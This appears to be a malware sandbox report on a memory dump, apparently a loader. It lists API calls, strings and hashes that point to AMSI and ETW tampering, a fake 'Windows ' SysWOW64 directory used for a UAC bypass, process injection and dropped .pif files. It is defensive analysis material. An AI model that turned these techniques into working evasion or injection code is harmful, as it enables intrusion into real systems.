Part of subcall function 02CBDBA8: NtClose.NTDLL(?), ref: 02CBDC5D

Part of subcall function 02CA7E34: GetFileAttributesA.KERNEL32(00000000,?,02CC2A41,ScanString,02CFCF00,02CCAFD0,OpenSession,02CFCF00,02CCAFD0,ScanBuffer,02CFCF00,02CCAFD0,OpenSession,02CFCF00,02CCAFD0,Initialize), ref: 02CA7E3F

Part of subcall function 02CBDAC4: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02CBDB03
Part of subcall function 02CBDAC4: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02CBDB6A
Part of subcall function 02CBDAC4: NtClose.NTDLL(?), ref: 02CBDB73

Part of subcall function 02CB8798: LoadLibraryW.KERNEL32(?,?), ref: 02CB87AC
Part of subcall function 02CB8798: GetProcAddress.KERNEL32(02D01390,BCryptVerifySignature), ref: 02CB87C6
Part of subcall function 02CB8798: FreeLibrary.KERNEL32(02D01390,02D01390,BCryptVerifySignature,bcrypt,?,02D013D0,00000000,02D013A4,02CBA3BF,ScanString,02D013A4,02CBA774,ScanBuffer,02D013A4,02CBA774,Initialize), ref: 02CB8802

Part of subcall function 02CB8704: LoadLibraryW.KERNEL32(amsi), ref: 02CB870D
Part of subcall function 02CB8704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02CB876C

Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02CFCF00,02CCAFD0,OpenSession,02CFCF00,02CCAFD0,ScanBuffer,02CFCF00,02CCAFD0,OpenSession,02CFCF00,02CCAFD0,02CCB328), ref: 02CC49AF

Part of subcall function 02CBDA3C: RtlInitUnicodeString.NTDLL ref: 02CBDA64
Part of subcall function 02CBDA3C: RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02CBDA7A
Part of subcall function 02CBDA3C: NtDeleteFile.NTDLL(?), ref: 02CBDA99

MoveFileA.KERNEL32(00000000,00000000), ref: 02CC4BAF
MoveFileA.KERNEL32(00000000,00000000), ref: 02CC4C05

Strings

SxTracerGetThreadContextDebug, xrefs: 02CC9805, 02CCA4D5
DllRegisterServer, xrefs: 02CBEFF9, 02CBF545
NtOpenObjectAuditAlarm, xrefs: 02CC896E
sppc, xrefs: 02CC95A9, 02CC95DC, 02CC960F, 02CC9642, 02CCA552, 02CCA585
NtQueryVirtualMemory, xrefs: 02CCA5D4
SLGatherMigrationBlob, xrefs: 02CCA53B
CreateProcessAsUserA, xrefs: 02CCA13E
NtWriteVirtualMemory, xrefs: 02CCA7D2
DllGetActivationFactory, xrefs: 02CBF512
C:\\Windows \\SysWOW64\\, xrefs: 02CC3AC6, 02CC3EDA
EnumServicesStatusA, xrefs: 02CCA0D5
NtQueryDirectoryFile, xrefs: 02CCA0B7
RtlAllocateHeap, xrefs: 02CC9D67, 02CC9DCD
[InternetShortcut], xrefs: 02CC6490
Initialize, xrefs: 02CBED3F, 02CBFCC1, 02CBFE55, 02CBFFF3, 02CC0199, 02CC044E, 02CC0AF1, 02CC0F2D, 02CC13D7, 02CC14E1, 02CC1BC8, 02CC1EFA, 02CC221A, 02CC254E, 02CC26FC, 02CC2A55, 02CC2E0E, 02CC4FB6, 02CC534B, 02CC5747, 02CC590C, 02CC5B78, 02CC5CB6, 02CC5EBB, 02CC6E30, 02CC7AE8, 02CC8AF5, 02CC96E0, 02CC9A7E, 02CC9FAD, 02CCA367, 02CCA8B3
GZmMS1j, xrefs: 02CBECB4
ScanBuffer, xrefs: 02CBEE6B, 02CBF1C3, 02CBF3ED, 02CBF954, 02CBFA61, 02CBFB79, 02CBFF4D, 02CC00EB, 02CC0291, 02CC03B1, 02CC0546, 02CC063E, 02CC08A7, 02CC0A4D, 02CC0BE9, 02CC0CFF, 02CC0D8D, 02CC10A1, 02CC1342, 02CC1453, 02CC15F0, 02CC199B, 02CC1AA7, 02CC1CC5, 02CC1DE2, 02CC20FD, 02CC219E, 02CC2312, 02CC24D2, 02CC27F4, 02CC2BEB, 02CC2E8A, 02CC2F1B, 02CC32D5, 02CC34B7, 02CC362B, 02CC37AE, 02CC382A, 02CC39E1, 02CC3BEB, 02CC3E49, 02CC407B, 02CC42BF, 02CC4507, 02CC47BD, 02CC4923, 02CC4AB8, 02CC4DF0, 02CC512A, 02CC5443, 02CC57C3, 02CC5AFC, 02CC5DAE, 02CC5FB3, 02CC6119, 02CC628D, 02CC6309, 02CC6EAC, 02CC6F3D, 02CC736D, 02CC7500, 02CC765C, 02CC7754, 02CC7C71, 02CC7F3E, 02CC80E4, 02CC8271, 02CC8405, 02CC8584, 02CC87FB, 02CC88F3, 02CC8D0F, 02CC8FE8, 02CC915C, 02CC9392, 02CC9424, 02CC975C, 02CC9AFA, 02CCA029, 02CCA92F
WinHttp.WinHttpRequest.5.1, xrefs: 02CC17E1
tquery, xrefs: 02CC97E9
NtAccessCheck, xrefs: 02CCA739
ScanString, xrefs: 02CBEDA3, 02CBF032, 02CBF147, 02CBF2D8, 02CBF469, 02CBF6F2, 02CBF833, 02CBFDB9, 02CC09D1, 02CC0B6D, 02CC0FA9, 02CC11C4, 02CC1240, 02CC155D, 02CC1883, 02CC1B4C, 02CC1F89, 02CC23BA, 02CC25CA, 02CC2680, 02CC29AF, 02CC2AD1, 02CC2D92, 02CC31DD, 02CC3CD5, 02CC414B, 02CC4340, 02CC4CF8, 02CC4E92, 02CC51D7, 02CC559B, 02CC5C3A, 02CC6420, 02CC6597, 02CC664F, 02CC6CBC, 02CC7156, 02CC75BD, 02CC7BE0, 02CC8687, 02CC8A79, 02CC8E62, 02CC921E, 02CC951C, 02CC98D7, 02CC9CBE, 02CC9EB5, 02CCA45F
DlpGetWebSiteAccess, xrefs: 02CC9C09
Ntdll, xrefs: 02CCA09E, 02CCA0AD, 02CCA0BC, 02CCA0CB
VirtualAlloc, xrefs: 02CCA1FC
endpointdlp, xrefs: 02CC9B87, 02CC9BBA, 02CC9BED, 02CC9C20
NtAlertResumeThread, xrefs: 02CC9D34
NtQuerySecurityObject, xrefs: 02CCA706
NtCreateSection, xrefs: 02CCA66D
GET, xrefs: 02CC18FA
EnumServicesStatusW, xrefs: 02CCA0E4
MiniDumpWriteDump, xrefs: 02CC8996
GetProxyDllInfo, xrefs: 02CBEFCF
EtwEventWriteEx, xrefs: 02CCA838
NtOpenSection, xrefs: 02CCA63A
SLGetEncryptedPIDEx, xrefs: 02CCA56E
@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%, xrefs: 02CC3359
NtSetSecurityObject, xrefs: 02CC89BE
EnumProcessModules, xrefs: 02CCA111
advapi32, xrefs: 02CC8987
kernel32, xrefs: 02CCA213, 02CCA246, 02CCA279, 02CCA2AC, 02CCA2DF, 02CCA312, 02CCA345
VirtualAllocEx, xrefs: 02CCA22F
RtlCreateQueryDebugBuffer, xrefs: 02CC9E00
DlpCheckIsCloudSyncApp, xrefs: 02CC9BA3
http, xrefs: 02CC15CD
HotKey=, xrefs: 02CC6629
SLGetGenuineInformation, xrefs: 02CC9592
BCryptVerifySignature, xrefs: 02CBF34E, 02CC99C9
NtDeviceIoControlFile, xrefs: 02CCA0A8
WriteVirtualMemory, xrefs: 02CCA2C8
SLLoadApplicationPolicies, xrefs: 02CC962B
RetailTracerEnable, xrefs: 02CC97D2
NtMapViewOfSection, xrefs: 02CCA6A0
UacScan, xrefs: 02CBEECF, 02CBF57E, 02CBF676, 02CBFC45, 02CC082B, 02CC0E09, 02CC176B, 02CC1E7E, 02CC308F, 02CC3259, 02CC33BA, 02CC3533, 02CC36B6, 02CC3887, 02CC3965, 02CC3AF3, 02CC3FFF, 02CC43BC, 02CC45F1, 02CC52CF, 02CC583F, 02CC5A04, 02CC5D32, 02CC5E3F, 02CC609D, 02CC6195, 02CC6D38, 02CC70DA, 02CC72F1, 02CC7484, 02CC76D8, 02CC7B64, 02CC7CED, 02CC7E46, 02CC7FEC, 02CC8179, 02CC830D, 02CC848C, 02CC8703, 02CC8B71, 02CC8D8B, 02CC8F6C, 02CC90E0, 02CC9316, 02CCA186
NtQuerySystemInformation, xrefs: 02CCA099
CryptSIPGetInfo, xrefs: 02CBF239
LdrLoadDll, xrefs: 02CCA76C
DllGetClassObject, xrefs: 02CBEFA8, 02CBF4DF, 02CC9838, 02CCA508
Advapi, xrefs: 02CCA0DA, 02CCA0E9, 02CCA0F8, 02CCA107, 02CCA143, 02CCA152, 02CCA161
UacInitialize, xrefs: 02CBEF33, 02CBF5FA, 02CBFD3D, 02CC3D51, 02CC41C7, 02CC49C0, 02CC4C7C, 02CC5032, 02CC551F, 02CC7035, 02CC8877, 02CC8C93
mssip32, xrefs: 02CBF250, 02CBF283, 02CBF2B6, 02CC98B5
NtOpenProcess, xrefs: 02CC89D2
CreateProcessWithLogonW, xrefs: 02CCA15C
IconIndex=, xrefs: 02CC64F5
CryptSIPVerifyIndirectData, xrefs: 02CBF26C, 02CC989E
URL=file:", xrefs: 02CC649F
DlpGetArchiveFileTraceInfo, xrefs: 02CC9BD6
psapi, xrefs: 02CC9882
NtWaitForSingleObject, xrefs: 02CC9D9A
ieproxy, xrefs: 02CBEFB9, 02CBEFE0, 02CBF010
NtGetWriteWatch, xrefs: 02CCA5A1
C:\Users\Public\alpha.pif, xrefs: 02CC4B2E
C:\Windows\System32\, xrefs: 02CBF8AF, 02CC70B3, 02CC7DFB
MiniDumpReadDumpStream, xrefs: 02CC89AA
NtReadVirtualMemory, xrefs: 02CCA6D3
OpenSession, xrefs: 02CBECDB, 02CBEE07, 02CBF7B7, 02CBF8D8, 02CBF9E5, 02CBFAFD, 02CBFED1, 02CC006F, 02CC0215, 02CC0335, 02CC04CA, 02CC05C2, 02CC07AF, 02CC0955, 02CC0C83, 02CC0EB1, 02CC1025, 02CC1148, 02CC12C6, 02CC166C, 02CC16EF, 02CC1807, 02CC191F, 02CC1A2B, 02CC1C49, 02CC1D66, 02CC2005, 02CC2081, 02CC2296, 02CC2436, 02CC2778, 02CC2933, 02CC2B4D, 02CC2C67, 02CC2F97, 02CC3436, 02CC35AF, 02CC3732, 02CC3B6F, 02CC3DCD, 02CC3F07, 02CC4243, 02CC448B, 02CC466D, 02CC4741, 02CC48A7, 02CC4A3C, 02CC4D74, 02CC4F0E, 02CC50AE, 02CC5253, 02CC53C7, 02CC5617, 02CC56CB, 02CC5988, 02CC5A80, 02CC5F37, 02CC6211, 02CC6385, 02CC651B, 02CC66CB, 02CC6DB4, 02CC6FB9, 02CC71D2, 02CC7275, 02CC7408, 02CC77D0, 02CC7A6C, 02CC7D69, 02CC7EC2, 02CC8068, 02CC81F5, 02CC8389, 02CC8508, 02CC860B, 02CC877F, 02CC89FD, 02CC8BED, 02CC8EDE, 02CC9064, 02CC929A, 02CC94A0, 02CC9664, 02CC9953, 02CC9A02, 02CC9C42, 02CC9E39, 02CC9F31, 02CCA3E3, 02CCA9AB
psapi, xrefs: 02CCA116
BCryptQueryProviderRegistration, xrefs: 02CBF381
sys.thgiseurt, xrefs: 02CC3EC4
EnumServicesStatusExA, xrefs: 02CCA0F3
C:\\Windows \\SysWOW64\\svchost.exe, xrefs: 02CC36A0
EnumServicesStatusExW, xrefs: 02CCA102
.url, xrefs: 02CC54D3
SLIsGenuineLocalEx, xrefs: 02CC95F8
dbgcore, xrefs: 02CC899B, 02CC89AF
NtQueryInformationThread, xrefs: 02CCA607
C:\Users\Public\, xrefs: 02CC317B, 02CC54C8, 02CC673B
BCryptRegisterProvider, xrefs: 02CBF3B4
CryptSIPGetSignedDataMsg, xrefs: 02CBF29F
CreateProcessAsUserW, xrefs: 02CCA14D, 02CCA16B
spp, xrefs: 02CC981C, 02CC984F, 02CCA4EC
WintrustAddActionID, xrefs: 02CBF0DB
EtwEventWrite, xrefs: 02CCA86B
OpenProcess, xrefs: 02CCA295
FindCertsByIssuer, xrefs: 02CBF10E
DlpNotifyPreDragDrop, xrefs: 02CC9B70
CreateProcessA, xrefs: 02CCA120
bcrypt, xrefs: 02CBF365, 02CBF398, 02CBF3CB, 02CC99E0
RtlQueryProcessDebugInformation, xrefs: 02CCA0C6
smartscreenps, xrefs: 02CBF4F6, 02CBF529, 02CBF55C
LdrGetProcedureAddress, xrefs: 02CCA79F
ntdll, xrefs: 02CC8973, 02CC89C3, 02CC89D7, 02CC9D4B, 02CC9D7E, 02CC9DB1, 02CC9DE4, 02CC9E17, 02CCA5B8, 02CCA5EB, 02CCA61E, 02CCA651, 02CCA684, 02CCA6B7, 02CCA6EA, 02CCA71D, 02CCA750, 02CCA783, 02CCA7B6, 02CCA7E9, 02CCA81C, 02CCA84F, 02CCA882
I_QueryTagInformation, xrefs: 02CC8982
VirtualProtect, xrefs: 02CCA262
SLGetSLIDList, xrefs: 02CC95C5
SetUnhandledExceptionFilter, xrefs: 02CCA32E
NtOpenFile, xrefs: 02CCA805
TrustOpenStores, xrefs: 02CBF0A8
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02CBFE2F
C:\\Users\\Public\\Libraries\\, xrefs: 02CC4B5E, 02CC4BB4, 02CC58AF
UacUninitialize, xrefs: 02CC2D16, 02CC3013, 02CC310B, 02CC38E9, 02CC3F83
CreateProcessW, xrefs: 02CCA12F
FX.c, xrefs: 02CC46F3
FlushInstructionCache, xrefs: 02CCA2FB
C:\Users\Public\aken.pif, xrefs: 02CC4B49
NEO.c, xrefs: 02CC443D
sppwmi, xrefs: 02CCA51F
GetProcessMemoryInfo, xrefs: 02CC986B
Kernel32, xrefs: 02CCA125, 02CCA134, 02CCA170
lld.SLITUTEN, xrefs: 02CC3AB0
wintrust, xrefs: 02CBF0BF, 02CBF0F2, 02CBF125

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: FilePath$Library$AddressModuleNameProc$FreeHandleName_$CloseLoadMove$AttributesCheckDebuggerDeleteInitPresentRemoteSleepStringUnicodeWrite
String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
API String ID: 4208238443-2905671141
Opcode ID: 8f2507b0fe592f815622c0d18d75616a11e5ff98de43234aa2cc9cda2b54ba14
Instruction ID: 57547e07bb2d36c129e5013cbddbfc442b2126a19c7f68dbfa33248cdc3bbcbc
Opcode Fuzzy Hash: 8f2507b0fe592f815622c0d18d75616a11e5ff98de43234aa2cc9cda2b54ba14
Instruction Fuzzy Hash: A3241F75B4015D8FDB65EBA4DC90ADEB3BABF84308F2041F5E109A7218DA71AE45EF40

Function 02CC786F Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2772
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02CB8903), ref: 02CB8860
Part of subcall function 02CB881C: GetProcAddress.KERNEL32(02D01384,00000000), ref: 02CB8879
Part of subcall function 02CB881C: FreeLibrary.KERNEL32(02D01384,00000000,02D01388,Function_000055D8,00000004,02D01398,02D01388,000186A3,00000040,02D0139C,02D01384,00000000,00000000,00000000,00000000,02CB8903), ref: 02CB88E3

CreateProcessAsUserW.ADVAPI32(02DF57D8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02DF57DC,02DF5820,OpenSession,02CFCF00,02CCAFD0,UacScan,02CFCF00), ref: 02CC7E31
ResumeThread.KERNEL32(02DF5824,ScanBuffer,02CFCF00,02CCAFD0,OpenSession,02CFCF00,02CCAFD0,UacScan,02CFCF00,02CCAFD0,ScanBuffer,02CFCF00,02CCAFD0,OpenSession,02CFCF00,02CCAFD0), ref: 02CC847B
CloseHandle.KERNEL32(02DF5820,ScanBuffer,02CFCF00,02CCAFD0,OpenSession,02CFCF00,02CCAFD0,UacScan,02CFCF00,02CCAFD0,02DF5824,ScanBuffer,02CFCF00,02CCAFD0,OpenSession,02CFCF00), ref: 02CC85FA

Part of subcall function 02CB8798: LoadLibraryW.KERNEL32(?,?), ref: 02CB87AC
Part of subcall function 02CB8798: GetProcAddress.KERNEL32(02D01390,BCryptVerifySignature), ref: 02CB87C6
Part of subcall function 02CB8798: FreeLibrary.KERNEL32(02D01390,02D01390,BCryptVerifySignature,bcrypt,?,02D013D0,00000000,02D013A4,02CBA3BF,ScanString,02D013A4,02CBA774,ScanBuffer,02D013A4,02CBA774,Initialize), ref: 02CB8802

CloseHandle.KERNEL32(02DF5820,02DF5820,ScanBuffer,02CFCF00,02CCAFD0,UacInitialize,02CFCF00,02CCAFD0,ScanBuffer,02CFCF00,02CCAFD0,OpenSession,02CFCF00,02CCAFD0,UacScan,02CFCF00), ref: 02CC89EC

Part of subcall function 02CBDAC4: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02CBDB03
Part of subcall function 02CBDAC4: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02CBDB6A
Part of subcall function 02CBDAC4: NtClose.NTDLL(?), ref: 02CBDB73

Part of subcall function 02CB8184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CB820E), ref: 02CB81F0

ExitProcess.KERNEL32(00000000,OpenSession,02CFCF00,02CCAFD0,ScanBuffer,02CFCF00,02CCAFD0,Initialize,02CFCF00,02CCAFD0,00000000,00000000,00000000,ScanString,02CFCF00,02CCAFD0), ref: 02CCAA1D

Strings

DllGetClassObject, xrefs: 02CC9838, 02CCA508
Advapi, xrefs: 02CCA0DA, 02CCA0E9, 02CCA0F8, 02CCA107, 02CCA143, 02CCA152, 02CCA161
SxTracerGetThreadContextDebug, xrefs: 02CC9805, 02CCA4D5
UacInitialize, xrefs: 02CC8877, 02CC8C93
mssip32, xrefs: 02CC98B5
CreateProcessWithLogonW, xrefs: 02CCA15C
NtOpenProcess, xrefs: 02CC89D2
CryptSIPVerifyIndirectData, xrefs: 02CC989E
NtOpenObjectAuditAlarm, xrefs: 02CC896E
DlpGetArchiveFileTraceInfo, xrefs: 02CC9BD6
psapi, xrefs: 02CC9882
NtWaitForSingleObject, xrefs: 02CC9D9A
NtGetWriteWatch, xrefs: 02CCA5A1
NtQueryVirtualMemory, xrefs: 02CCA5D4
SLGatherMigrationBlob, xrefs: 02CCA53B
sppc, xrefs: 02CC95A9, 02CC95DC, 02CC960F, 02CC9642, 02CCA552, 02CCA585
C:\Windows\System32\, xrefs: 02CC7DFB
CreateProcessAsUserA, xrefs: 02CCA13E
MiniDumpReadDumpStream, xrefs: 02CC89AA
NtWriteVirtualMemory, xrefs: 02CCA7D2
NtReadVirtualMemory, xrefs: 02CCA6D3
OpenSession, xrefs: 02CC787C, 02CC79F0, 02CC7A6C, 02CC7D69, 02CC7EC2, 02CC8068, 02CC81F5, 02CC8389, 02CC8508, 02CC860B, 02CC877F, 02CC89FD, 02CC8BED, 02CC8EDE, 02CC9064, 02CC929A, 02CC94A0, 02CC9664, 02CC9953, 02CC9A02, 02CC9C42, 02CC9E39, 02CC9F31, 02CCA3E3, 02CCA9AB
psapi, xrefs: 02CCA116
EnumServicesStatusA, xrefs: 02CCA0D5
NtQueryDirectoryFile, xrefs: 02CCA0B7
Initialize, xrefs: 02CC78F8, 02CC7AE8, 02CC8AF5, 02CC96E0, 02CC9A7E, 02CC9FAD, 02CCA367, 02CCA8B3
RtlAllocateHeap, xrefs: 02CC9D67, 02CC9DCD
ScanBuffer, xrefs: 02CC7C71, 02CC7F3E, 02CC80E4, 02CC8271, 02CC8405, 02CC8584, 02CC87FB, 02CC88F3, 02CC8D0F, 02CC8FE8, 02CC915C, 02CC9392, 02CC9424, 02CC975C, 02CC9AFA, 02CCA029, 02CCA92F
EnumServicesStatusExA, xrefs: 02CCA0F3
EnumServicesStatusExW, xrefs: 02CCA102
tquery, xrefs: 02CC97E9
NtAccessCheck, xrefs: 02CCA739
ScanString, xrefs: 02CC7974, 02CC7BE0, 02CC8687, 02CC8A79, 02CC8E62, 02CC921E, 02CC951C, 02CC98D7, 02CC9CBE, 02CC9EB5, 02CCA45F
DlpGetWebSiteAccess, xrefs: 02CC9C09
SLIsGenuineLocalEx, xrefs: 02CC95F8
NtQueryInformationThread, xrefs: 02CCA607
Ntdll, xrefs: 02CCA09E, 02CCA0AD, 02CCA0BC, 02CCA0CB
dbgcore, xrefs: 02CC899B, 02CC89AF
VirtualAlloc, xrefs: 02CCA1FC
endpointdlp, xrefs: 02CC9B87, 02CC9BBA, 02CC9BED, 02CC9C20
NtAlertResumeThread, xrefs: 02CC9D34
NtQuerySecurityObject, xrefs: 02CCA706
NtCreateSection, xrefs: 02CCA66D
EnumServicesStatusW, xrefs: 02CCA0E4
MiniDumpWriteDump, xrefs: 02CC8996
CreateProcessAsUserW, xrefs: 02CCA14D, 02CCA16B
EtwEventWriteEx, xrefs: 02CCA838
spp, xrefs: 02CC981C, 02CC984F, 02CCA4EC
EtwEventWrite, xrefs: 02CCA86B
OpenProcess, xrefs: 02CCA295
NtOpenSection, xrefs: 02CCA63A
CreateProcessA, xrefs: 02CCA120
DlpNotifyPreDragDrop, xrefs: 02CC9B70
SLGetEncryptedPIDEx, xrefs: 02CCA56E
EnumProcessModules, xrefs: 02CCA111
NtSetSecurityObject, xrefs: 02CC89BE
bcrypt, xrefs: 02CC99E0
RtlQueryProcessDebugInformation, xrefs: 02CCA0C6
kernel32, xrefs: 02CCA213, 02CCA246, 02CCA279, 02CCA2AC, 02CCA2DF, 02CCA312, 02CCA345
advapi32, xrefs: 02CC8987
LdrGetProcedureAddress, xrefs: 02CCA79F
VirtualAllocEx, xrefs: 02CCA22F
ntdll, xrefs: 02CC8973, 02CC89C3, 02CC89D7, 02CC9D4B, 02CC9D7E, 02CC9DB1, 02CC9DE4, 02CC9E17, 02CCA5B8, 02CCA5EB, 02CCA61E, 02CCA651, 02CCA684, 02CCA6B7, 02CCA6EA, 02CCA71D, 02CCA750, 02CCA783, 02CCA7B6, 02CCA7E9, 02CCA81C, 02CCA84F, 02CCA882
RtlCreateQueryDebugBuffer, xrefs: 02CC9E00
VirtualProtect, xrefs: 02CCA262
I_QueryTagInformation, xrefs: 02CC8982
SLGetSLIDList, xrefs: 02CC95C5
SetUnhandledExceptionFilter, xrefs: 02CCA32E
DlpCheckIsCloudSyncApp, xrefs: 02CC9BA3
NtOpenFile, xrefs: 02CCA805
SLGetGenuineInformation, xrefs: 02CC9592
WriteVirtualMemory, xrefs: 02CCA2C8
BCryptVerifySignature, xrefs: 02CC99C9
NtDeviceIoControlFile, xrefs: 02CCA0A8
SLLoadApplicationPolicies, xrefs: 02CC962B
CreateProcessW, xrefs: 02CCA12F
RetailTracerEnable, xrefs: 02CC97D2
FlushInstructionCache, xrefs: 02CCA2FB
sppwmi, xrefs: 02CCA51F
NtMapViewOfSection, xrefs: 02CCA6A0
GetProcessMemoryInfo, xrefs: 02CC986B
UacScan, xrefs: 02CC7B64, 02CC7CED, 02CC7E46, 02CC7FEC, 02CC8179, 02CC830D, 02CC848C, 02CC8703, 02CC8B71, 02CC8D8B, 02CC8F6C, 02CC90E0, 02CC9316, 02CCA186
NtQuerySystemInformation, xrefs: 02CCA099
Kernel32, xrefs: 02CCA125, 02CCA134, 02CCA170
LdrLoadDll, xrefs: 02CCA76C

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: CloseHandleLibrary$AddressFreePathProcProcess$CacheCreateExitFileFlushInstructionLoadModuleNameName_ResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 4004194653-1225450241
Opcode ID: f00b9bf03f43e5befb15b30be60d76a24dbc1699d3f543f3e0fc584120664040
Instruction ID: d16d4d61a996ced92a09553c41eabc391f306bb868230d6884a0aa4ebd01bc35
Opcode Fuzzy Hash: f00b9bf03f43e5befb15b30be60d76a24dbc1699d3f543f3e0fc584120664040
Instruction Fuzzy Hash: D9430C75A4015D8BDB25FBA4DD909DEB3BABF88308F2041E5E109E7214DA71AE91EF40

Function 02CA1727 Relevance: 9.0, APIs: 7, Instructions: 288
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 02CA17D0
Sleep.KERNEL32(0000000A,00000000), ref: 02CA17E6

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 42dd7e6e8cc5272789ef9b82049968d85403a2b8ebd58836c8de4831838edefa
Instruction ID: 58f5b3b343dfc880b7940c4ab71a3ff97ca2a3c3fbf5ebe84d940bea77d82026
Opcode Fuzzy Hash: 42dd7e6e8cc5272789ef9b82049968d85403a2b8ebd58836c8de4831838edefa
Instruction Fuzzy Hash: 82B14272A003528BDB15CF29D8A0355BBE1FB85318F1D87AED609CB395C7B0A951CB90

Function 02CB8798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

